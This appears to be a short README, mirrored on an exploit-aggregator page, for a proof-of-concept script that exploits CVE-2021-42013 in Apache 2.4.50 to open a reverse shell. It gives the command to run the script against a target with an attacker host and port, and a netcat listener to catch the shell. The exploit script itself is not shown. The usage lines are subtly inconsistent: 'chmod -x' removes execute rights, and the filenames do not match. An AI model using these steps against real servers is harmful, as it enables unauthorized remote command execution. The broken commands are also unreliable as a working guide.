PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI
# CVE-2021-42013_Reverse-Shell
PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI
## Usage :
```sh
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT
```
### More info:
```sh
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:8083 10.0.000.000 9999
nc -lvnp 9999
```
### References
https://nvd.nist.gov/vuln/detail/CVE-2021-42013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
https://tryhackme.com/room/cve202141773
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view